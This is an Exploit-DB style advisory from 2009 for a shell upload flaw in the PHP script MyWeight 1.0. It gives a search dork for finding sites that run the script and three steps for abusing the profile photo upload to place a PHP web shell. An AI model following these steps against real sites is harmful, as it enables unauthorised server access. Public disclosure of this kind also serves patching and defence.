MyWeight 1.0 - Arbitrary File Upload

EDB-ID:

9441

CVE:





Platform:

PHP

Date:

2009-08-14


=======================================================
+++++++++++++++++++ information +++++++++++++++++++++++
=======================================================
[+] Script :MyWeight 1.0 Shell Upload Vulnerability

[+] D0rk : Powered By phplemon.com

[+] Script site : http://www.myweight.me.uk

[+] Found by : Mr.tro0oqy  
   
[+] C0ntact : t.4@windowslive.com <Yemeni ana>
=======================================================
+++++++++++++++++++++++ Exploit +++++++++++++++++++++++
=======================================================
exploit:
-------
step1: register in site

http://www.xxx.com/path/user_register.php

step2: go to your profile

http://www.xxx.com/path/user_photo.php

step3: upload shell.php


enjoy :)

# milw0rm.com [2009-08-14]